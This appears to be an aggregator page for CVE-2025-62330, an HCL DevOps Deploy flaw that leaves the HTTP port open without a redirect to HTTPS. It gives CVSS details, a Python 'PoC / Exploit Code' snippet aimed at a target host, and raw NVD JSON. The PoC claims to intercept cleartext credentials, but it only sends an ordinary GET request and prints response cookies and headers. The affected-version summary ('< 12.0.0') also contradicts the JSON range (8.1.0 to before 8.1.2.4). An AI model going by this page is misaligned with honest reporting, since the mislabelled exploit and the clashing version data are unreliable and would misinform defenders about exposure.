Security Vulnerability Report
中文
CVE-2025-62330 CVSS 5.9 MEDIUM

CVE-2025-62330

Published: 2025-12-16 07:15:53
Last Modified: 2026-01-07 21:05:18

Description

HCL DevOps Deploy is susceptible to a cleartext transmission of sensitive information because the HTTP port remains accessible and does not redirect to HTTPS as intended. As a result, an attacker with network access could intercept or modify user credentials and session-related data via passive monitoring or man-in-the-middle attacks.

CVSS Details

CVSS Score
5.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:hcltechsw:hcl_devops_deploy:*:*:*:*:*:*:*:* - VULNERABLE
HCL DevOps Deploy < 12.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # 目标URL(HTTP而非HTTPS) url = "http://target-host:8080/" # 发送HTTP请求 response = requests.get(url) # 检查响应中的敏感信息 if 'session' in response.cookies: print(f"泄露的会话Cookie: {response.cookies['session']}") # 尝试拦截明文认证信息 if response.headers.get('Authorization'): print(f"泄露的认证头: {response.headers['Authorization']}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62330", "sourceIdentifier": "[email protected]", "published": "2025-12-16T07:15:53.457", "lastModified": "2026-01-07T21:05:18.267", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL DevOps Deploy is susceptible to a cleartext transmission of sensitive information because the HTTP port remains accessible and does not redirect to HTTPS as intended. As a result, an attacker with network access could intercept or modify user credentials and session-related data via passive monitoring or man-in-the-middle attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltechsw:hcl_devops_deploy:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.1.0", "versionEndExcluding": "8.1.2.4", "matchCriteriaId": "BDB41F3C-0562-47CC-856D-FD03AC2AB0D7"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127333", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}